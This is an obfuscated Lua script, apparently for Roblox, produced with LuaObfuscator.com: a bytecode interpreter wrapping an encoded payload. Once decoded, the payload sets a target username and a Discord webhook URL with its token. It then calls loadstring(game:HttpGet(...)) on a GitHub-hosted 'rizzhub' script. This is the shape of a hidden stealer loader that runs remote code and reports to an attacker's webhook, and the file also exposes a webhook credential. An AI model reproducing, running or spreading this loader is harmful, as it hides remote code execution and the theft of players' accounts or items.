--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=v2(v0(v20,16));if v19 then local v78=v5(v74,v19);v19=nil;return v78;else return v74;end end end);local function v21(v22,v23,v24)if v24 then local v75=0 + 0 ;local v76;while true do if (v75==(946 -(42 + 904))) then v76=(v22/((5 -3)^(v23-(2 -(3 -2)))))%((2 -0)^(((v24-(1 + 0)) -(v23-1)) + (1880 -(794 + 1085)))) ;return v76-(v76%(1 + (0 -0))) ;end end else local v77=(2 -0)^(v23-1) ;return (((v22%(v77 + v77))>=v77) and 1) or (0 + 0 + (0 -0)) ;end end local function v25()local v38=0 + 0 ;local v39;while true do if (v38==((1361 + 3) -(652 + 711))) then return v39;end if (v38==(1023 -(277 + 746))) then v39=v1(v16,v18,v18);v18=v18 + 1 ;v38=933 -(519 + 413) ;end end end local function v26()local v40=(0 + 0) -0 ;local v41;local v42;while true do if (((0 + 0) -0)==v40) then v41,v42=v1(v16,v18,v18 + (7 -5) );v18=v18 + (1 -0) + 1 ;v40=1 + 0 ;end if (v40==((1106 -(394 + 711)) + 0)) then return (v42 * 256) + v41 ;end end end local function v27()local v43,v44,v45,v46=v1(v16,v18,v18 + 2 + 1 );v18=v18 + (6 -2) ;return (v46 * ((177722037 -132732822) -28211999)) + (v45 * (17014 + 48522)) + (v44 * (885 -629)) + v43 ;end local function v28()local v47=v27();local v48=v27();local v49=(59 + 13) -(30 + 41) ;local v50=(v21(v48,1,20) * ((464 -(268 + 194))^(1584 -(287 + 1265)))) + v47 ;local v51=v21(v48,83 -62 ,6 + 25 );local v52=((v21(v48,30 + 2 )==(1763 -(655 + 1107))) and  -(85 -(56 + 28))) or (1 -0) ;if (v51==(0 + 0)) then if (v50==(191 -(63 + 128))) then return v52 * ((0 + 0) -(0 + 0)) ;else v51=1;v49=0 -0 ;end elseif (v51==((5036 -(594 + 547)) -(344 + 1504))) then return ((v50==((626 -(270 + 356)) -0)) and (v52 * ((480 -((2077 -(130 + 1759)) + 291))/0))) or (v52 * NaN) ;end return v8(v52,v51-((520 + 2197) -1694) ) * (v49 + (v50/((1423 -(448 + 973))^(12 + 40)))) ;end local function v29(v30)local v53=0 -0 ;local v54;local v55;while true do if (v53==3) then return v6(v55);end if ((1761 -(860 + (1381 -480)))==v53) then v54=nil;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v53=1;end if (v53==1) then v54=v3(v16,v18,(v18 + v30) -(65 -(58 + 6)) );v18=v18 + v30 ;v53=2;end if (v53==((1960 -(1411 + 153)) -(278 + 116))) then v55={};for v79=3 -2 , #v54 do v55[v79]=v2(v1(v3(v54,v79,v79)));end v53=8 -5 ;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v56=0 -0 ;local v57;local v58;local v59;local v60;local v61;local v62;while true do local v66=177 -(156 + 21) ;local v67;while true do if (v66~=0) then else v67=0 + 0 ;while true do if (v67~=(165 -(90 + 75))) then else if (2~=v56) then else local v99=0;local v100;while true do if (v99~=(0 -0)) then else v100=0 -0 ;while true do if (v100==(245 -(84 + 160))) then local v112=0;while true do if (v112~=(0 + 0)) then else for v128=1,v27() do v59[v128]=v27();end return v60;end end end if (v100==(0 -0)) then local v113=0 -0 ;while true do if ((0 + 0)==v113) then for v130=2 -1 ,v27() do local v131=0 -0 ;local v132;local v133;while true do if (v131==(739 -(187 + 551))) then while true do if (v132==0) then v133=v25();if (v21(v133,2 -1 ,1)~=0) then else local v161=1430 -(524 + 906) ;local v162;local v163;local v164;local v165;local v166;while true do if (v161~=0) then else v162=0;v163=nil;v161=235 -(162 + 72) ;end if (v161==(1 -0)) then local v172=0 -0 ;while true do if (v172==(0 -0)) then v164=nil;v165=nil;v172=1 + 0 ;end if ((1 -0)~=v172) then else v161=553 -(148 + 403) ;break;end end end if ((2 + 0)~=v161) then else v166=nil;while true do if (v162~=(1 -0)) then else local v173=0;while true do if (v173==(2 -1)) then v162=2;break;end if ((58 -(42 + 16))==v173) then v165=nil;v166=nil;v173=1 + 0 ;end end end if (v162~=2) then else while true do if (v163==(6 -3)) then if (v21(v165,1578 -(1011 + 564) ,3)~=1) then else v166[4]=v62[v166[2 + 2 ]];end v57[v130]=v166;break;end if (v163==(5 -3)) then local v175=1523 -(1167 + 356) ;local v176;local v177;while true do if (v175==1) then while true do if ((0 + 0)==v176) then v177=1825 -(1756 + 69) ;while true do if (v177==(0 -0)) then local v188=0 + 0 ;local v189;while true do if (v188~=(0 -0)) then else v189=246 -(180 + 66) ;while true do if ((1874 -(453 + 1420))==v189) then v177=319 -(62 + 256) ;break;end if (v189~=0) then else local v194=0;while true do if (1~=v194) then else v189=1;break;end if ((823 -(602 + 221))~=v194) then else if (v21(v165,1506 -(143 + 1362) ,1 + 0 )~=1) then else v166[2]=v62[v166[2]];end if (v21(v165,2 + 0 ,1 + 1 )==(1 + 0)) then v166[1207 -(601 + 603) ]=v62[v166[3]];end v194=1 + 0 ;end end end end break;end end end if (v177==(1 + 0)) then v163=913 -(285 + 625) ;break;end end break;end end break;end if (v175==(0 + 0)) then v176=826 -(40 + 786) ;v177=nil;v175=989 -(923 + 65) ;end end end if (1~=v163) then else local v178=0 + 0 ;local v179;local v180;while true do if (v178~=(1 + 0)) then else while true do if (v179==0) then v180=0;while true do if ((4 -3)~=v180) then else v163=1 + 1 ;break;end if (v180==(248 -(34 + 214))) then local v190=0 + 0 ;while true do if ((0 + 0)==v190) then v166={v26(),v26(),nil,nil};if (v164==0) then local v193=0 + 0 ;while true do if (v193==(776 -(122 + 654))) then v166[3]=v26();v166[4]=v26();break;end end elseif (v164==(2 -1)) then v166[8 -5 ]=v27();elseif (v164==2) then v166[12 -9 ]=v27() -(2^(46 -30)) ;elseif (v164~=(1 + 2)) then else local v204=0 + 0 ;local v205;local v206;while true do if (v204~=(1576 -(1323 + 252))) then else while true do if (v205==0) then v206=0;while true do if ((1948 -(1029 + 919))==v206) then v166[3]=v27() -((2 + 0)^16) ;v166[12 -8 ]=v26();break;end end break;end end break;end if (v204~=(1607 -(1126 + 481))) then else v205=1032 -(968 + 64) ;v206=nil;v204=839 -(543 + 295) ;end end end v190=1;end if (v190==(1407 -(407 + 999))) then v180=1 + 0 ;break;end end end end break;end end break;end if (v178==(0 -0)) then v179=0;v180=nil;v178=722 -(528 + 193) ;end end end if (v163==(0 -0)) then local v181=846 -(708 + 138) ;local v182;local v183;while true do if (v181==1) then while true do if (v182~=(0 -0)) then else v183=0 -0 ;while true do if (v183==(1 + 0)) then v163=760 -(134 + 625) ;break;end if (v183==(0 -0)) then local v191=0;local v192;while true do if (v191==(0 + 0)) then v192=0;while true do if ((626 -(18 + 607))==v192) then v183=1;break;end if (v192==(0 + 0)) then local v195=0 -0 ;while true do if (v195==(0 + 0)) then v164=v21(v133,330 -(211 + 117) ,3 + 0 );v165=v21(v133,4,1254 -(485 + 763) );v195=2 -1 ;end if (v195==(1715 -(69 + 1645))) then v192=1145 -(450 + 694) ;break;end end end end break;end end end end break;end end break;end if (v181~=0) then else v182=1371 -(232 + 1139) ;v183=nil;v181=1;end end end end break;end if (v162==(0 + 0)) then v163=0;v164=nil;v162=2 -1 ;end end break;end end end break;end end break;end if (v131~=(1260 -(1057 + 203))) then else v132=1054 -(713 + 341) ;v133=nil;v131=1 + 0 ;end end end for v134=1,v27() do v58[v134-(1039 -(901 + 137)) ]=v33();end v113=2 -1 ;end if (v113~=1) then else v100=2 -1 ;break;end end end end break;end end end if (v56==1) then v61=v27();v62={};for v104=1 + 0 ,v61 do local v105=0 -0 ;local v106;local v107;local v108;local v109;while true do if (v105==(1 + 0)) then v108=nil;v109=nil;v105=1 + 1 ;end if (v105==(0 -0)) then v106=0;v107=nil;v105=2 -1 ;end if ((1047 -(532 + 513))~=v105) then else while true do if ((0 + 0)~=v106) then else local v116=0 + 0 ;while true do if (v116==(670 -(225 + 444))) then v106=468 -(294 + 173) ;break;end if (v116~=(0 -0)) then else v107=0;v108=nil;v116=708 -(289 + 418) ;end end end if (v106==(1852 -(308 + 1543))) then v109=nil;while true do if (v107==(0 + 0)) then local v136=1302 -(263 + 1039) ;local v137;while true do if (v136~=(35 -(30 + 5))) then else v137=0 + 0 ;while true do if (v137==(1 -0)) then v107=1;break;end if (v137==(0 -0)) then local v159=0 -0 ;while true do if (v159==(3 -2)) then v137=1 + 0 ;break;end if (v159~=(0 + 0)) then else v108=v25();v109=nil;v159=1638 -(1072 + 565) ;end end end end break;end end end if (v107~=1) then else if (v108==(1 -0)) then v109=v25()~=(834 -(687 + 147)) ;elseif (v108==(978 -(758 + 218))) then v109=v28();elseif (v108==(1 + 2)) then v109=v29();end v62[v104]=v109;break;end end break;end end break;end end end v60[3]=v25();v56=2 + 0 ;end v67=1 + 0 ;end if (v67==(1662 -(429 + 1232))) then if ((0 -0)==v56) then local v102=0 + 0 ;local v103;while true do if (v102~=0) then else v103=1070 -(457 + 613) ;while true do if ((1 + 0)==v103) then local v114=1696 -(1144 + 552) ;while true do if (v114~=1) then else v103=1 + 1 ;break;end if (v114==(0 -0)) then v59={};v60={v57,v58,nil,v59};v114=112 -(76 + 35) ;end end end if (v103~=(9 -7)) then else v56=1;break;end if ((0 -0)~=v103) then else local v115=0 -0 ;while true do if (v115==(0 -0)) then v57={};v58={};v115=1;end if (v115~=(2 -1)) then else v103=1 + 0 ;break;end end end end break;end end end break;end end break;end end end end local function v34(v35,v36,v37)local v63=v35[1];local v64=v35[2];local v65=v35[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (3==v68) then A,B=v32(v11(v73));if  not A[1] then local v91=v35[4][v69] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==2) then v73=nil;v73=function()local v81=v63;local v82=v64;local v83=v65;local v84=v32;local v85={};local v86={};local v87={};for v92=1738 -(1481 + 257) ,v72 do if (((2492 + (2743 -(86 + 694)))<=(22006 -17355)) and (v92>=v83)) then v85[v92-v83 ]=v71[v92 + 1 + 0 ];else v87[v92]=v71[v92 + (1238 -(73 + 1164)) ];end end local v88=(v72-v83) + (1482 -(1023 + 458)) ;local v89;local v90;while true do local v93=131 -(96 + 35) ;local v94;while true do if (((113 + 175)<=3030) and (v93==(0 -0))) then v94=0 -(0 + 0) ;while true do if (((60 + 1178)<(9215 -6046)) and (v94==(1628 -(1187 + 440)))) then if ((v90<=4) or ((2097 -(709 + 17))>(5269 -(1204 + 61)))) then if (((672 + 290)==(717 + 155 + 90)) and (v90<=((4 -3) + 0))) then if ((v90==(0 -0)) or ((1254 + (6803 -5008))>=(4980 -(504 + 982)))) then v37[v89[1304 -(17 + 1284) ]]=v87[v89[4 -(435 -(137 + 296)) ]];else do return;end end elseif (((6453 -3544)<2972) and (v90<=(1 + 1))) then v87[v89[(748 + 500) -(547 + 699) ]]();elseif ((4739>(8370 -4380)) and (v90==3)) then v69=v89[(2311 -(244 + 668)) -(205 + 795 + 396) ];elseif ((((3573 -(607 + 107)) -1648)<(2633 + 285)) and (v87[v89[480 -(144 + 334) ]]==v89[4])) then v69=v69 + 1 + 0 ;else v69=v89[(453 + 1521) -(1215 + 756) ];end elseif (((9309 -(15343 -8648))<=(4425 -(151 + (2371 -923)))) and (v90<=(21 -15))) then if ((v90==(10 -5)) or ((1448 -(52 + 377 + 207))>((9944 -6301) -(1454 + 273)))) then v87[v89[1026 -(15 + 1009) ]]=v89[(400 -(157 + 240)) + 0 ];else local v121=0 + 0 ;local v122;local v123;while true do if (((3270 -1708)==(2926 -(960 + 404))) and (v121==(0 -0))) then local v148=(2605 -(183 + 682)) -(27 + (1880 -(13 + 154))) ;while true do if (((1 -0)==v148) or ((1929 -(1420 + 483))==(210 + 583))) then v121=1 -0 ;break;end if ((v148==(0 -0)) or ((304 + 36 + 251)>(1732 + 1385))) then v122=v89[5 -3 ];v123=v87[v89[(456 -273) -(55 + 125) ]];v148=2 -1 ;end end end if ((v121==(2 -1)) or ((2700 -1841)>=(542 + 1086))) then v87[v122 + 1 + 0 ]=v123;v87[v122]=v123[v89[4]];break;end end end elseif (((10777 -7897)>=(2199 + 308)) and (v90<=(4 + 3))) then local v124=0 + 0 ;local v125;local v126;while true do if (((5660 -(691 + 814))<(5187 -(487 + 224 + 90))) and (v124==(1 + 0))) then while true do if (((4634 -(226 + 12))<=(9674 -4729)) and (v125==(0 -0))) then v126=v89[3 -1 ];v87[v126]=v87[v126](v13(v87,v126 + (244 -(28 + 215)) ,v70));break;end end break;end if (((1722 -(165 + 596))>(510 + 274)) and (v124==(1240 -(909 + 331)))) then v125=0 + 0 ;v126=nil;v124=1 + 0 ;end end elseif ((v90==(22 -14)) or ((3647 -(687 + 248))==(3046 -(12 + 1065)))) then v87[v89[1311 -(1116 + 193) ]]=v37[v89[2 + 1 ]];else local v142=0 -0 ;local v143;local v144;local v145;local v146;local v147;while true do if (((1463 + 1159)>=(2305 -(1418 + (489 -202)))) and (v142==(5 -3))) then v147=nil;while true do if ((((24360 -17450) -3572)<(6576 -(89 + 1573))) and (v143==(0 + (0 -0)))) then local v160=0 + 0 ;while true do if (((3769 -(2686 -(488 + 465)))>(1878 -1021)) and (v160==(0 -(419 -(8 + 411))))) then v144=v89[1 + 1 ];v145,v146=v84(v87[v144](v13(v87,v144 + 1 ,v89[2 + 1 ])));v160=1369 -(213 + 559 + 596) ;end if ((v160==(1 + 0)) or ((377 + 322)>(4970 -(38 + (500 -(326 + 19)))))) then v143=1 + 0 ;break;end end end if ((v143==(6 -4)) or ((616 + 3547)<(278 + 368))) then for v167=v144,v70 do local v168=0 -0 ;local v169;local v170;while true do if ((1==v168) or ((6099 -(374 + 1006))<=(4551 -(1368 + 249)))) then while true do if ((v169==(0 + 0)) or ((1802 -(28 + 217 + 457))>(2254 -882))) then v170=0 + (0 -0) ;while true do if (((7954 -(6157 -(89 + 371)))<=(13722 -8755)) and (v170==(677 -(22 + 655)))) then v147=v147 + (382 -(103 + 278)) ;v87[v167]=v145[v147];break;end end break;end end break;end if (((20 -11)==(37 -28)) and (v168==(0 + 0))) then v169=0 -0 ;v170=nil;v168=803 -(141 + 661) ;end end end break;end if (((6583 -(315 + 1444))>(4129 -2594)) and (v143==(2 -1))) then v70=(v146 + v144) -(1407 -(1270 + 136)) ;v147=1589 -(1308 + 281) ;v143=4 -(687 -(346 + 339)) ;end end break;end if (((184 + 408)==(2536 -1944)) and (v142==((0 -0) -0))) then v143=0;v144=nil;v142=1 + 0 ;end if (((14730 -11189)>=(943 + 295)) and (v142==(554 -(270 + 283)))) then v145=nil;v146=nil;v142=1 + 1 ;end end end v69=v69 + 1 ;break;end if (((2551 -(24 + 8))<(4479 + 244)) and (v94==(0 + 0))) then local v110=(34 + 1466) -(90 + 1410) ;local v111;while true do if ((v110==(950 -((973 -(50 + 824)) + 851))) or ((1578 + 2678)<=(211 -63))) then v111=1321 -(998 + 323) ;while true do if ((v111==(0 -0)) or ((2230 + 1062)<=(1021 -(354 + 338)))) then local v127=0 + 0 ;while true do if ((((7044 + 10209) -12698)>(3739 -(230 + 182 + 82))) and (v127==(0 -0))) then v89=v81[v69];v90=v89[1 -0 ];v127=1 -(1086 -(703 + 383)) ;end if (((3 -(2 + 0))==v127) or ((10656 -6412)<=(1336 + 2521))) then v111=1 + 0 ;break;end end end if (((6972 -(3258 -(223 + 258)))==((10979 -(386 + 871)) -(6975 -(1244 + 204)))) and (v111==(1052 -(371 + (1595 -915))))) then v94=1 + 0 + 0 ;break;end end break;end end end end break;end end end end;v68=3;end if (1==v68) then v71={...};v72=v12("#",...) -1 ;v68=2;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756103083O00557365724E616D6503083O006B726F6B65642O6903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130382O3739313430383033323739323639372F42696A646B65503756495155765F45323934503166645039742D5471522D4F794847504B727973474866486F6A66596146394735526D4749547439676C6D66395649563700143O0012053O00013O0026043O000B000100020004033O000B0001001208000100033O001208000200043O002006000200020005001205000400064O0009000200044O000700013O00022O00020001000100010004033O001300010026043O0001000100010004033O00010001001205000100083O00122O000100073O0012050001000A3O00122O000100093O0012053O00023O0004033O000100012O00013O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
